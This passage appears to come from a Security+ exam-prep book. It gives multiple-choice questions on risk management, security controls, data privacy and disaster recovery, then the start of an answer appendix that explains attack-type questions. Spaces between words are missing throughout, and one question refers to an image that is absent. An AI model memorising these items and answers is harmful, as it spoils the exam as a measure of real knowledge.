20. YouareasecurityadministratorandadvisethewebdevelopmentteamtoincludeaCAPTCHAonthewebpagewhereusersregisterforanaccount.Whichofthefollowingcontrolsisthisreferringto?

A. Deterrent

B. Detective

C. Compensating

D. Degaussing

21. Whichofthefollowingisnotacommonsecuritypolicytype?

A. Acceptableusepolicy

B. Socialmediapolicy

C. Passwordpolicy

D. Parkingpolicy

22. AstheITsecurityofficerforyourorganization,youareconfiguringdatalabeloptionsforyourcompany'sresearchanddevelopmentfileserver.Regularuserscanlabeldocumentsascontractor,public,orinternal.Whichlabelshouldbeassignedtocompanytradesecrets?

A. High

B. Topsecret

C. Proprietary

D. Low

23. Whichofthefollowingisnotaphysicalsecuritycontrol?

A. Motiondetector

B. Fence

C. Antivirussoftware

D. Closed-circuittelevision(CCTV)

24. Yoursecuritymanagerwantstodecidewhichriskstomitigatebasedoncost.Whatisthisanexampleof?


A. Quantitativeriskassessment

B. Qualitativeriskassessment

C. Businessimpactanalysis

D. Threatassessment

25. YourcompanyhasoutsourceditsproprietaryprocessestoAcmeCorporation.Duetotechnicalissues,Acmewantstoincludeathird-partyvendortohelpresolvethetechnicalissues.WhichofthefollowingmustAcmeconsiderbeforesendingdatatothethirdparty?

A. Thisdatashouldbeencryptedbeforeitissenttothethird-partyvendor.

B. Thismayconstituteunauthorizeddatasharing.

C. Thismayviolatetheprivilegeduserrole-basedawarenesstraining.

D. Thismayviolateanondisclosureagreement.

26. Whichofthefollowingisconsideredadetectivecontrol?

A. Closed-circuittelevision(CCTV)

B. Anacceptableusepolicy

C. Firewall

D. IPS

27. WhichofthefollowingistypicallyincludedinaBPA?

A. Clearstatementsdetailingtheexpectationbetweenacustomerandaserviceprovider

B. Theagreementthataspecificfunctionorservicewillbedeliveredattheagreed-onlevelofperformance

C. Sharingofprofitsandlossesandtheadditionorremovalofapartner

D. SecurityrequirementsassociatedwithinterconnectingITsystems

28. Youarethenetworkadministratorofyourcompany,andthemanagerofaretailsitelocatedacrosstownhascomplainedaboutthelossofpowertotheirbuildingseveraltimesthisyear.Thebranchmanagerisaskingforacompensatingcontroltoovercomethepoweroutage.Whatcompensatingcontrolwouldyourecommend?


A. Firewall

B. Securityguard

C. IDS

D. Backupgenerator

29. Jamesisasecurityadministratorandisattemptingtoblockunauthorizedaccesstothedesktopcomputerswithinthecompany'snetwork.Hehasconfiguredthecomputers’operatingsystemstolockafter5minutesofnoactivity.WhattypeofsecuritycontrolhasJamesimplemented?

A. Preventive

B. Corrective

C. Deterrent

D. Detective

30. Anaccountingemployeechangesroleswithanotheraccountingemployeeevery4months.Whatisthisanexampleof?

A. Separationofduties

B. Mandatoryvacation

C. Jobrotation

D. Onboarding

31. Tony'scompanywantstolimittheirriskduetocustomerdata.Whatpracticeshouldtheyputinplacetoensurethattheyhaveonlythedataneededfortheirbusinesspurposes?

A. Datamasking

B. Dataminimization

C. Tokenization

D. Anonymization

32. YourcompanywebsiteishostedbyanInternetserviceprovider.Whichofthefollowingriskresponsetechniquesisinuse?

A. Riskavoidance

B. Riskregister


C. Riskacceptance

D. Riskmitigation

33. Asecurityadministratorisreviewingthecompany'scontinuityplan,anditspecifiesanRTOoffourhoursandanRPOofoneday.Whichofthefollowingistheplandescribing?

A. Systemsshouldberestoredwithinonedayandshouldremainoperationalforatleastfourhours.

B. Systemsshouldberestoredwithinfourhoursandnolaterthanonedayaftertheincident.

C. Systemsshouldberestoredwithinonedayandlose,atmost,fourhours’worthofdata.

D. Systemsshouldberestoredwithinfourhourswithalossofoneday'sworthofdataatmost.

34. Whichofthefollowingstatementsistrueregardingadataretentionpolicy?

A. Regulationsrequirefinancialtransactionstobestoredforsevenyears.

B. Employeesmustremoveandlockupallsensitiveandconfidentialdocumentswhennotinuse.

C. Itdescribesaformalprocessofmanagingconfigurationchangesmadetoanetwork.

D. Itisalegaldocumentthatdescribesamutualagreementbetweenparties.

35. Howdoyoucalculatetheannuallossexpectancy(ALE)thatmayoccurduetoathreat?

A. Exposurefactor(EF)/singlelossexpectancy(SLE)

B. Singlelossexpectancy(SLE)×annualrateofoccurrence(ARO)

C. Assetvalue(AV)×exposurefactor(EF)

D. Singlelossexpectancy(SLE)/exposurefactor(EF)

36. MichellehasbeenaskedtousetheCISbenchmarkforWindows10aspartofhersystemsecurityprocess.Whatinformationwillshebeusing?

A. InformationonhowsecureWindows10isinitsdefaultstate


B. AsetofrecommendedsecurityconfigurationstosecureWindows10

C. PerformancebenchmarktoolsforWindows10systems,includingnetworkspeedandfirewallthroughput

D. VulnerabilityscandataforWindows10systemsprovidedbyvariousmanufacturers

37. Whichofthefollowingisthebestexampleofapreventivecontrol?

A. Databackups

B. Securitycamera

C. Dooralarm

D. Smokedetectors

38. Youareasecurityadministratorforyourcompanyandyouidentifyasecurityriskthatyoudonothavein-houseskillstoaddress.Youdecidetoacquirecontractresources.Thecontractorwillberesponsibleforhandlingandmanagingthissecurityrisk.Whichofthefollowingtypeofriskresponsetechniquesareyoudemonstrating?

A. Accept

B. Mitigate

C. Transfer

D. Avoid

39. Eachsalespersonwhotravelshasacablelocktolockdowntheirlaptopwhentheystepawayfromthedevice.Towhichofthefollowingcontrolsdoesthisapply?

A. Administrative

B. Compensating

C. Deterrent

D. Preventive

40. Youareaserveradministratorforyourcompany'sprivatecloud.Toprovideservicetoemployees,youareinstructedtousereliableharddisksintheservertohostavirtualenvironment.Whichofthefollowingbestdescribesthereliabilityofharddrives?


A. MTTR

B. RPO

C. MTBF

D. ALE

41. Allofyourorganization'strafficflowsthroughasingleconnectiontotheInternet.Whichofthefollowingtermsbestdescribesthisscenario?

A. Cloudcomputing

B. Loadbalancing

C. Singlepointoffailure

D. Virtualization

42. Whichofthefollowingbestdescribesthedisadvantagesofquantitativeriskanalysiscomparedtoqualitativeriskanalysis?

A. Quantitativeriskanalysisrequiresdetailedfinancialdata.

B. Quantitativeriskanalysisissometimessubjective.

C. Quantitativeriskanalysisrequiresexpertiseonsystemsandinfrastructure.

D. Quantitativeriskprovidesclearanswerstorisk-basedquestions.

43. LeighAnnisthenewnetworkadministratorforalocalcommunitybank.Shestudiesthecurrentfileserverfolderstructuresandpermissions.Thepreviousadministratordidn'tproperlysecurecustomerdocumentsinthefolders.LeighAnnassignsappropriatefileandfolderpermissionstobesurethatonlytheauthorizedemployeescanaccessthedata.WhatsecurityroleisLeighAnnassuming?

A. Poweruser

B. Dataowner

C. User

D. Custodian

44. Categorizingresidualriskismostimportanttowhichofthefollowingriskresponsetechniques?

A. Riskmitigation


B. Riskacceptance

C. Riskavoidance

D. Risktransfer

45. YouaretheITmanagerandoneofyouremployeesaskswhoassignsdatalabels.Whichofthefollowingassignsdatalabels?

A. Owner

B. Custodian

C. Privacyofficer

D. Systemadministrator

46. Whichofthefollowingisthemostpressingsecurityconcernrelatedtosocialmedianetworks?

A. OtheruserscanviewyourMACaddress.

B. OtheruserscanviewyourIPaddress.

C. Employeescanleakacompany'sconfidentialinformation.

D. Employeescanexpresstheiropinionabouttheircompany.

47. Whatconceptisbeingusedwhenuseraccountsarecreatedbyoneemployeeanduserpermissionsareconfiguredbyanotheremployee?

A. Backgroundchecks

B. Jobrotation

C. Separationofduties

D. Collusion

48. Asecurityanalystisanalyzingthecostthecompanycouldincurifthecustomerdatabasewasbreached.Thedatabasecontains2,500recordswithpersonallyidentifiableinformation(PII).Studiesshowthecostperrecordwouldbe$300.Thelikelihoodthatthedatabasewouldbebreachedinthenextyearisonly5percent.WhichofthefollowingwouldbetheALEforasecuritybreach?

A. $15,000

B. $37,500

C. $150,000


D. $750,000

49. Whichofthefollowingconceptsdefinesacompanygoalforsystemrestorationandacceptabledataloss?

A. MTBF

B. MTTR

C. RPO

D. ARO

50. Yourcompanyhiresathird-partyauditortoanalyzethecompany'sdatabackupandlong-termarchivingpolicy.Whichtypeoforganizationdocumentshouldyouprovidetotheauditor?

A. Cleandeskpolicy

B. Acceptableusepolicy

C. Securitypolicy

D. Dataretentionpolicy

51. Youareanetworkadministratorandhavebeengiventhedutyofcreatinguseraccountsfornewemployeesthecompanyhashired.Theseemployeesareaddedtotheidentityandaccessmanagementsystemandassignedmobiledevices.Whatprocessareyouperforming?

A. Offboarding

B. Systemowner

C. Onboarding

D. Executiveuser

52. Whattypeofcontrolisseparationofduty?

A. Physical

B. Operational

C. Technical

D. Compensating

53. WhichofthefollowingrightsisnotincludedintheGDPR?

A. Therighttoaccess


B. Therighttobeforgotten

C. Therighttodataportability

D. Therighttoanonymity

54. NickisfollowingtheNationalInstituteofStandardsandTechnology(NIST)RiskManagementFramework(RMF)andhascompletedtheprepareandcategorizesteps.Whichstepintheriskmanagementframeworkisnext?

A. Assessingcontrols

B. Implementingcontrols

C. Monitoringcontrols

D. Selectingcontrols

55. Whyarediversityoftrainingtechniquesanimportantconceptforsecurityprogramadministrators?

A. Itallowsformultiplefundingsources.

B. Eachpersonrespondstotrainingdifferently.

C. Itavoidsasinglepointoffailureintrainingcompliance.

D. ItisrequiredforcompliancewithPCI-DSS.

56. Alyssahasbeenaskedtocategorizetheriskofoutdatedsoftwareinherorganization.Whattypeofriskcategorizationshouldsheuse?

A. Internal

B. Quantitative

C. Qualitative

D. External

57. Whattermisusedtodescribealistingofallofanorganization'srisks,includinginformationabouttherisk'srating,howitisbeingremediated,remediationstatus,andwhoownsorisassignedresponsibilityfortherisk?

A. AnSSAE

B. Ariskregister

C. Arisktable


D. ADSS

58. Whichofthefollowingtermsisusedtomeasurehowmaintainableasystemordeviceis?

A. MTBF

B. MTTF

C. MTTR

D. MITM

59. ThecompanythatOliviaworksforhasrecentlyexperiencedadatabreachthatexposedcustomerdata,includingtheirhomeaddresses,shoppinghabits,emailaddresses,andcontactinformation.Olivia'scompanyisanindustryleaderintheirspacebuthasstrongcompetitorsaswell.Whichofthefollowingimpactsisnotlikelytooccurnowthattheorganizationhascompletedtheirincidentresponseprocess?

A. Identitytheft

B. Financialloss

C. Reputationloss

D. Availabilityloss

60. EricworksfortheU.S.governmentandneedstoclassifydata.WhichofthefollowingisnotacommonclassificationtypeforU.S.governmentdata?

A. TopSecret

B. Secret

C. Confidential

D. Civilian

61. Whichofthefollowingisnotacommonlocationforprivacypracticestoberecordedorcodified?

A. Aformalprivacynotice

B. Thesourcecodeforaproduct

C. Thetermsoftheorganization'sagreementwithcustomers

D. Noneoftheabove

62. Whatkeydifferenceseparatespseudonymizationandanonymization?


A. Anonymizationusesencryption.

B. Pseudonymizationrequiresadditionaldatatoreidentifythedatasubject.

C. Anonymizationcanbereversedusingahash.

D. Pseudonymizationusesrandomizedtokens.

63. Whatpolicyclearlystatestheownershipofinformationcreatedorusedbyanorganization?

A. Adatagovernancepolicy

B. Aninformationsecuritypolicy

C. Anacceptableusepolicy

D. Adataretentionpolicy

64. Helen'sorganizationprovidestelephonesupportfortheirentirecustomerbaseasacriticalbusinessfunction.Shehascreatedaplanthatwillensurethatherorganization'sVoiceoverIP(VoIP)phoneswillberestoredintheeventofadisaster.Whattypeofplanhasshecreated?

A. Adisasterrecoveryplan

B. AnRPOplan

C. Afunctionalrecoveryplan

D. AnMTBFplan

65. Greghasdatathatisclassifiedashealthinformationthathisorganizationusesaspartoftheircompany'sHRdata.Whichofthefollowingstatementsistrueforhiscompany'ssecuritypolicy?

A. Thehealthinformationmustbeencrypted.

B. Gregshouldreviewrelevantlawtoensurethehealthinformationishandledproperly.

C. Companiesareprohibitedfromstoringhealthinformationandmustoutsourcetothirdparties.

D. Alloftheabove

66. Whattypeofinformationdoesacontrolriskapplyto?

A. Healthinformation


B. Personallyidentifiableinformation(PII)

C. Financialinformation

D. Intellectualproperty

67. WhattypeofimpactisanindividualmostlikelytoexperienceifadatabreachthatincludesPIIoccurs?

A. IPtheft

B. Reputationdamage

C. Fines

D. Identitytheft

68. Isaachasbeenaskedtowritehisorganization'ssecuritypolicies.Whatpolicyiscommonlyputinplaceforserviceaccounts?

A. Theymustbeissuedonlytosystemadministrators.

B. Theymustusemultifactorauthentication.

C. Theycannotuseinteractivelogins.

D. Alloftheabove

69. Ninaistaskedwithputtingradiofrequencyidentification(RFID)tagsoneverynewpieceofequipmentthatentersherdatacenterthatcostsmorethan$500.Whattypeoforganizationalpolicyismostlikelytoincludethistypeofrequirement?

A. Achangemanagementpolicy

B. Anincidentresponsepolicy

C. Anassetmanagementpolicy

D. Anacceptableusepolicy

70. Meganisreviewingherorganization'sdatacenternetworkdiagramasshowninthefollowingimage.WhatshouldshenoteforpointAonthediagram?


A. Awirelesslink

B. Aredundantconnection

C. Awiredlink

D. Asinglepointoffailure

71. Emmaisreviewingthird-partyriskstoherorganization,andNate,herorganization'sprocurementofficer,notesthatpurchasesofsomelaptopsfromthecompany'shardwarevendorhavebeendelayedduetolackofavailabilityofSSDs(solidstatedrives)andspecificCPUsforspecificconfigurations.WhattypeofriskshouldEmmadescribethisas?

A. Financialrisk

B. Alackofvendorsupport


C. Systemintegration

D. Supplychain

72. Henryhasimplementedanintrusiondetectionsystem.WhatcategoryandcontroltypecouldhelistforanIDS?

A. Technical,Detective

B. Administrative,Preventative

C. Technical,Corrective

D. Administrative,Detective

73. AmandaadministersWindows10workstationsforhercompanyandwantstouseasecureconfigurationguidefromatrustedsource.WhichofthefollowingisnotacommonsourceforWindows10securitybenchmarks?

A. CIS

B. Microsoft

C. TheFTC

D. TheNSA

74. KatiehasdiscoveredaWindows2008webserverrunninginherenvironment.Whatsecurityconcernshouldshelistforthissystem?

A. Windows2008onlyrunson32-bitplatforms.

B. Windows2008cannotrunmodernwebserversoftware.

C. Windows2008hasreacheditsendoflifeandcannotbepatched.

D. Alloftheabove

75. Patchingsystemsimmediatelyafterpatchesarereleasedisanexampleofwhatriskmanagementstrategy?

A. Acceptance

B. Avoidance

C. Mitigation

D. Transference

76. Charleswantstodisplayinformationfromhisorganization'sriskregisterinaneasy-to-understandand-rankformat.Whatcommontoolisusedtohelp


managementquicklyunderstandrelativerankingsofrisk?

A. Riskplots

B. Aheatmap

C. Aqualitativeriskassessment

D. Aquantitativeriskassessment

77. Whatkeyelementofregulations,liketheEuropeanUnion's(EU's)GDPR,driveorganizationstoincludethemintheiroverallassessmentofriskposture?

A. Potentialfines

B. Theirannuallossexpectancy(ALE)

C. Theirrecoverytimeobjective(RTO)

D. Thelikelihoodofoccurrence

78. Whatphasesofhandlingadisasterarecoveredbyadisasterrecoveryplan?

A. Whattodobeforethedisaster

B. Whattododuringthedisaster

C. Whattodoafterthedisaster

D. Alloftheabove

79. Naomi'sorganizationhasrecentlyexperiencedabreachofcreditcardinformation.Afterinvestigation,itisdiscoveredthatherorganizationwasinadvertentlynotfullycompliantwithPCI-DSSandisnotcurrentlyfullycompliant.Whichofthefollowingpenaltiesisherorganizationmostlikelytoincur?

A. Criminalcharges

B. Fines

C. Terminationofthecreditcardprocessingagreement

D. Alloftheabove

80. AlainawantstomapacommonsetofcontrolsforcloudservicesbetweenstandardslikeCOBIT(ControlObjectivesforInformationandRelatedTechnology),FedRAMP(FederalRiskandAuthorizationManagementProgram),HIPAA(theHealthInsurancePortabilityandAccountabilityAct


of1996),andothers.Whatcansheusetospeedupthatprocess?

A. TheCSA'sreferencearchitecture

B. ISO27001

C. TheCSA'scloudcontrolmatrix

D. ISO27002

81. Garyhascreatedanapplicationthatnewstaffinhisorganizationareaskedtouseaspartoftheirtraining.Theapplicationshowsthemexamplesofphishingemailsandasksthestaffmemberstoidentifytheemailsthataresuspiciousandwhy.Correctanswersreceivepoints,andincorrectanswerssubtractpoints.Whattypeofusertrainingtechniqueisthis?

A. Capturetheflag

B. Gamification

C. Phishingcampaigns

D. Role-basedtraining

82. WhatlaworregulationrequiresaDPOinorganizations?

A. FISMA

B. COPPA

C. PCI-DSS

D. GDPR

83. TheuniversitythatSusanworksforconductstopsecretresearchfortheU.S.DepartmentofDefenseaspartofapartnershipwithitsengineeringschool.Arecentlydiscoveredbreachpointstotheschoolbeingcompromisedforoverayearbyanadvancedpersistentthreatactor.WhatconsequenceofthebreachshouldSusanbemostconcernedabout?

A. Costtorestoreoperations

B. Fines

C. Identitytheft

D. IPtheft

84. Whattermisusedtodescribethefunctionsthatneedtobecontinuedthroughoutorresumedasquicklyaspossibleafteradisaster?


A. Singlepointsoffailure

B. Mission-essentialfunctions

C. Recoverytimeobjectives

D. Corerecoveryfunctions

85. Yourcompanyisconsideringmovingitsmailservertoahostingcompany.Thiswillhelpreducehardwareandserveradministratorcostsatthelocalsite.Whichofthefollowingdocumentswouldformallystatethereliabilityandrecourseifthereliabilityisnotmet?

A. MOU

B. SLA

C. ISA

D. BPA

86. Rick'sorganizationprovidesawebsitethatallowsuserstocreateanaccountandthenuploadtheirarttosharewithotherusers.Heisconcernedaboutabreachandwantstoproperlyclassifythedatafortheirhandlingprocess.WhatdatatypeismostappropriateforRicktolabelthedatahisorganizationcollectsandstores?

A. Customerdata

B. PII

C. Financialinformation

D. Healthinformation

87. Jackisconductingariskassessment,andastaffmembernotesthatthecompanyhasspecialized,internalAIalgorithmsthatarepartofthecompany'smainproduct.WhatriskshouldJackidentifyasmostlikelytoimpactthosealgorithms?

A. External

B. Internal

C. IPtheft

D. Licensing

88. Danhaswrittenapolicythatprohibitsemployeesfromsharingtheir


passwordswiththeircoworkers,familymembers,orothers.Whattypeofcredentialpolicyhashecreated?

A. Devicecredentialpolicy

B. Personnelcredentialpolicy

C. Aserviceaccountpolicy

D. Anadministrativeaccountpolicy

89. Riskseverityiscalculatedusingtheequationshownhere.WhatinformationshouldbesubstitutedforX?

Riskseverity=X*Impact

A. Inherentrisk

B. MTTR(meantimetorepair)

C. Likelihoodofoccurrence

D. RTO(recoverytimeobjective)

90. Howisassetvaluedetermined?

A. Theoriginalcostoftheitem

B. Thedepreciatedcostoftheitem

C. Thecosttoreplacetheitem

D. Anyoftheabovebasedonorganizationalpreference

91. Whatprocessisusedtohelpidentifycriticalsystems?

A. ABIA

B. AnMTBF

C. AnRTO

D. AnICD

92. Zarmeenawantstotransfertheriskforbreachestoanotherorganization.Whichofthefollowingoptionsshouldsheusetotransfertherisk?

A. Explaintohermanagementthatbreacheswilloccur.

B. Blamefuturebreachesoncompetitors.

C. Sellherorganization'sdatatoanotherorganization.


D. Purchasecybersecurityinsurance.

93. Whichofthefollowingisacommonsecuritypolicyforserviceaccounts?

A. Limitingloginhours

B. Prohibitinginteractivelogins

C. Limitingloginlocations

D. Implementingfrequentpasswordexpiration

94. Thefinancialcostofabreachisanexampleofwhatcomponentofriskcalculations?

A. Probability

B. Riskseverity

C. Impact

D. Alloftheabove

95. Aspartofhisorganization'sefforttoidentifyanewheadquarterslocation,SeanreviewstheFederalEmergencyManagementAgency(FEMA)floodmapsforthepotentiallocationheisreviewing.Whatprocessrelatedtodisasterrecoveryplanningincludesactionslikethis?

A. Businessimpactanalysis(BIA)

B. Siteriskassessment

C. Crimepreventionthroughenvironmentaldesign

D. Businesscontinuityplanning

96. Joannawantstorequestanauditreportfromavendorsheisconsideringandplanstoreviewtheauditor'sopinionsontheeffectivenessofthesecurityandprivacycontrolsthevendorhasinplace.WhattypeofStandardforAttestationEngagements(SSAE)shouldsherequest?

A. SSAE-18SOC1,Type2

B. SSAE-18SOC2,Type1

C. SSAE-18SOC1,Type1

D. SSAE-18SOC2,Type2

97. Jasonhascreatedariskregisterforhisorganizationandregularlyupdatesitwithinputfrommanagersandseniorleadershipthroughoutthe


organization.Whatpurposedoesthisserve?

A. Itdecreasesinherentrisk.

B. Itincreasesriskawareness.

C. Itdecreasesresidualrisk.

D. Itincreasesriskappetite.

98. Lauraisawarethatherstatehaslawsthatguideherorganizationintheeventofabreachofpersonallyidentifiableinformation,includingSocialSecuritynumbers(SSNs).IfshehasabreachthatinvolvesSSNs,whatactionisshelikelytohavetotakebasedonstatelaw?

A. DestroyallSocialSecuritynumbers.

B. Reclassifyallimpacteddata.

C. Providepublicnotificationofthebreach.

D. Provideadataminimizationplan.

99. Whichofthefollowingdoesnotminimizesecuritybreachescommittedbyinternalemployees?

A. Jobrotation

B. Separationofduties

C. Nondisclosureagreementssignedbyemployees

D. Mandatoryvacations

100. Olivia'scloudserviceproviderclaimstoprovide“fiveninesofuptime”andOlivia'scompanywantstotakeadvantageofthatservicebecausetheirwebsitelosesthousandsofdollarseveryhourthatitisdown.WhatbusinessagreementcanOlivaputinplacetohelpensurethatthereliabilitythatthevendoradvertisesismaintained?

A. AnMOU

B. AnSLA

C. AnMSA

D. ABPA

101. Afterreviewingsystemsonhisnetwork,BrianhasdiscoveredthatdozensofthemarerunningcopiesofaCADsoftwarepackagethatthecompany


hasnotpaidfor.Whatrisktypeshouldheidentifythisas?

A. Internal

B. Legacysystems

C. IPtheft

D. Softwarecompliance

102. Garyisbeginninghisriskassessmentfortheorganizationandhasnotyetbeguntoimplementcontrols.Whatriskdoeshisorganizationface?

A. Residualrisk

B. IPtheftrisk

C. Multipartyrisk

D. Inherentrisk

103. HowisSLEcalculated?

A. AV*EF

B. RTO*AV

C. MTTR*EF

D. AV*ARO

104. Whattypeofcredentialpolicyistypicallycreatedtohandlecontractorsandconsultants?

A. Apersonnelpolicy

B. Aserviceaccountpolicy

C. Athird-partypolicy

D. Arootaccountpolicy

105. WaynehasestimatedtheAROforariskinhisorganizationtobe3.HowoftendoesWaynethinktheeventwillhappen?

A. Onceevery3months

B. Threetimesayear

C. Onceeverythreeyears

D. Onceayearforthreeyears


106. Gurvinderisassessingrisksfromdisasterstohiscompany'sfacilityandwantstoproperlycategorizetheminhisplanning.Whichofthefollowingisnotatypeofnaturaldisaster?

A. Fire

B. Flood

C. Tornado

D. Industrialaccidents

107. Madhuriisclassifyingallofherorganization'sdataandwantstoproperlyclassifytheinformationonthemainorganizationalwebsitethatisavailabletoanyonewhovisitsthesite.Whatdataclassificationshouldsheusefromthefollowinglist?

A. Sensitive

B. Confidential

C. Public

D. Critical

108. Elleworksforacreditcardcompanythathandlescreditcardtransactionsforbusinessesaroundtheworld.Whatdataprivacyroledoeshercompanyplay?

A. Adatacontroller

B. Adatasteward

C. Adatacustodian

D. Adataprocessor

109. ThewebsitethatBrianisusingshowspartofhisSocialSecuritynumber,notallofit,andreplacingtherestofthedigitswithasterisks,allowinghimtoverifythelastfourdigits.Whattechniqueisinuseonthewebsite?

A. Tokenization

B. Hashing

C. Encryption

D. Datamasking

110. Mikewantstolookforacommonsetoftoolsforsecurityandrisk


managementforhisinfrastructureasaservice(IaaS)environment.Whichofthefollowingorganizationsprovidesavendor-neutralreferencearchitecturethathecanusetovalidatehisdesign?

A. TheCenterforInternetSecurity(CIS)

B. ISO

C. TheCloudSecurityAlliance

D. NIST

111. Whattypeofcontrolisalock?

A. Managerial

B. Technical

C. Physical

D. Corrective

112. Isaachasdiscoveredthathisorganization'sfinancialaccountingsoftwareismisconfigured,causingincorrectdatatobereportedonanongoingbasis.Whattypeofriskisthis?

A. Inherentrisk

B. Residualrisk

C. Controlrisk

D. Transparentrisk

113. Whichofthefollowingisnotapotentialtypeofperson-madedisaster?

A. Fires

B. Oilspills

C. Hurricanes

D. War

114. SusanworksfortheU.S.governmentandhasidentifiedinformationinherorganizationthatrequiressomeprotection.Iftheinformationweredisclosedwithoutauthorization,itwouldcauseidentifiableharmtonationalsecurity.Howshouldsheclassifythedata?

A. TopSecret


B. Secret

C. Confidential

D. BusinessSensitive

115. Edservesashisorganization'sdatastewardandwantstoclassifyeachdataelementthatisusedintheirbusiness.Howshouldheclassifycellphonenumbers?

A. AsPHI

B. Asfinancialinformation

C. AsPII

D. Asgovernmentinformation

116. Marcuswantstoensurethatattackerscan'tidentifyhiscustomersiftheyweretogainacopyofhisorganization'swebapplicationdatabase.HewantstoprotecttheirSocialSecuritynumbers(SSNs)withanalternatevaluethathecanreferenceelsewherewhenheneedstolookupacustomerbytheirSSN.Whattechniqueshouldheusetoaccomplishthis?

A. Encryption

B. Tokenization

C. Datamasking

D. Datawashing

117. Whichofthefollowingisthemostcommonreasontoincludeaprivacynoticeonawebsite?

A. Towarnattackersaboutsecuritymeasures

B. Toavoidlawsuits

C. Duetoregulationsorlaws

D. Noneoftheabove

118. Nicoledetermineshowherorganizationprocessesdatathatitcollectsaboutitscustomersandalsodecideshowandwhypersonalinformationshouldbeprocessed.WhatroledoesNicoleplayinherorganization?

A. Datasteward

B. Datacustodian


C. Datacontroller

D. Dataconsumer

119. ThevirtualmachineclusterthatPatisinchargeofhassufferedamajorfailureinitsprimarycontroller.Theentireorganizationisoffline,andcustomerscannotgettotheorganization'swebsitewhichisitsprimarybusiness.WhattypeofdisasterhasPat'sorganizationexperienced?

A. AnMROdisaster

B. Aninternaldisaster

C. AnRTOdisaster

D. Anexternaldisaster

120. Whatimportantstepshouldbetakenearlyintheinformationlifecycletoensurethatorganizationscanhandlethedatatheycollect?

A. Dataretention

B. Dataclassification

C. Dataminimization

D. Dataexfiltration

121. Kirk'sorganizationhasbeenexperiencinglarge-scaledenial-of-service(DoS)attacksagainsttheirprimarywebsite.KirkcontractswithhisInternetserviceprovidertoincreasetheorganization'sbandwidthandexpandstheserverpoolforthewebsitetohandlesignificantlymoretrafficthananyofthepreviousDoSattacks.Whattypeofriskmanagementstrategyhasheemployed?

A. Acceptance

B. Avoidance

C. Transfer

D. Mitigation

122. Theco-locationfacilitythatJoannacontractstohostherorganization'sserversisinafloodplaininahurricanezone.WhattypeofriskbestdescribestheriskthatJoannaandothercustomersface?

A. Amultipartyrisk


B. Aninternalrisk

C. Alegacyrisk

D. AnIPtheftrisk

123. ThecloudservicethatNatasha'sorganizationhasusedforthepastfiveyearswillnolongerbeavailable.WhatphaseofthevendorrelationshipshouldNatashaplanforwiththisservice?

A. PreparingaserviceMOU

B. AnEOLtransitionprocess

C. CreatinganNDA

D. Alastwillandtestament

124. GarywantstouseasecureconfigurationbenchmarkforhisorganizationforLinux.Whichofthefollowingorganizationswouldprovideauseful,commonlyadoptedbenchmarkthathecoulduse?

A. Microsoft

B. NIST

C. CIS

D. Alloftheabove

125. AfterAngelaleftherlastorganization,shediscoveredthatshestillhadaccesstohershareddrivesandcouldlogintoheremailaccount.Whatcriticalprocesswaslikelyforgottenwhensheleft?

A. Anexitinterview

B. Jobrotation

C. Offboarding

D. Governance

126. Frankknowsthatbusinessescanuseanyclassificationlabelstheywant,buthealsoknowsthatthereareanumberofcommonlabelsinuse.Whichofthefollowingisnotacommondataclassificationlabelforbusinesses?

A. Public

B. Sensitive

C. Private


D. Secret

127. Whereareprivacynoticesfrequentlyfound?

A. Thetermsofanagreementforcustomers

B. Aclick-throughlicenseagreement

C. Awebsiteusageagreement

D. Alloftheabove


AppendixAnswersandExplanations


Chapter1: Threats,Attacks,andVulnerabilities1. C. Thecorrectanswerisspearphishing.Spearphishingistargetedtoa

specificgroup,inthiscaseinsuranceprofessionals.Althoughthisisaformofphishing,themorespecificansweristheoneyouwillneedtochooseonquestionslikethis.Phishingusessocialengineeringtechniquestosucceedbutisonceagainabroaderanswerthanspearphishingandthusisnotthecorrectchoice.Finally,aTrojanhorsepretendstobealegitimateordesirableprogramorfile,whichthisscenariodoesn’tdescribe.

2. B. Alogicbombismalwarethatperformsitsmaliciousactivitywhensomeconditionismet.Awormismalwarethatself-propagates.ATrojanhorseismalwareattachedtoalegitimateprogram,andarootkitismalwarethatgetsrootoradministrativeprivileges.

3. C. ThisisaverybasicformofSQLinjection.Cross-sitescriptingwouldhaveJavaScriptinthetextfieldandwouldbedesignedtoimpactothersitesfromauser’ssession.Cross-siterequestforgerywouldnotinvolveanytextbeingenteredinthewebpage,andARPpoisoningisalteringtheARPtableinaswitch;itisnotrelatedtowebsitehacking.

4. B. Thisdescribesajammingattack,wherelegitimatetrafficisinterferedwithbyanothersignal.Jammingcanbeintentionalorunintentionalandmaybeintermittent.IVattacksareobscurecryptographicattacksonstreamciphers.Wi-Fiprotectedsetup(WPS)usesaPINtoconnecttothewirelessaccesspoint(WAP).TheWPSattackattemptstointerceptthatPINintransmission,connecttotheWAP,andthenstealtheWPA2password.Abotnetisagroupofmachinesthatarebeingused,withouttheirconsent,aspartofanattack.

5. B. Thebestoptionlistedtodefendagainsttheattacksmentionedisinputvalidation.Encryptingthewebtrafficwillnothaveanyeffectonthesetwoattacks.Awebapplicationfirewall(WAF)mightmitigatetheseattacks,butitwouldbesecondarytoinputvalidation,andanintrusiondetectionsystem(IDS)willsimplydetecttheattack—itwon’tstopit.

6. C. IfusershavebeenconnectingbuttheAPdoesnotshowthemconnecting,thentheyhavebeenconnectingtoarogueaccesspoint.Thiscouldbethecauseofanarchitectureanddesignweaknesssuchasanetworkwithoutsegmentationandcontrolofdevicesconnectingtothe


network.Sessionhijackinginvolvestakingoveranalreadyauthenticatedsession.Mostsessionhijackingattacksinvolveimpersonation.Theattackerattemptstogainaccesstoanotheruser’ssessionbyposingasthatuser.Clickjackinginvolvescausingvisitorstoawebsitetoclickonthewrongitem.Finally,bluejackingisaBluetoothattack.

7. C. Cross-sitescriptinginvolvesenteringascriptintotextareasthatotheruserswillview.SQLinjectionisnotaboutenteringscripts,butratherSQLcommands.Clickjackingisabouttrickingusersintoclickingonthewrongthing.BluejackingisaBluetoothattack.

8. D. Retainingtheactualpasswordisnotabestpractice,andthusencryptingpasswordplaintextisnotacommontechniquetomakepasswordshardertocrack.Sincetheapplicationwouldneedthecryptographickeytoreadthepasswords,anybodywhohadaccesstothatkeycoulddecryptthepasswords.Usingasalt,apepper,andacryptographichashingalgorithmdesignedforpasswordsareallcommonbestpracticestopreventofflinebrute-forceattacks.

9. A. AlthoughthisisoneofthemoredateditemsontheSecurity+examoutline,youneedtoknowthatthetermforInternetmessagingspammessagesisSPIM.Therestoftheanswersweremadeup,andthoughthisshowsupintheexamoutline,therestoftheworldhasmovedonfromusingthisterm.

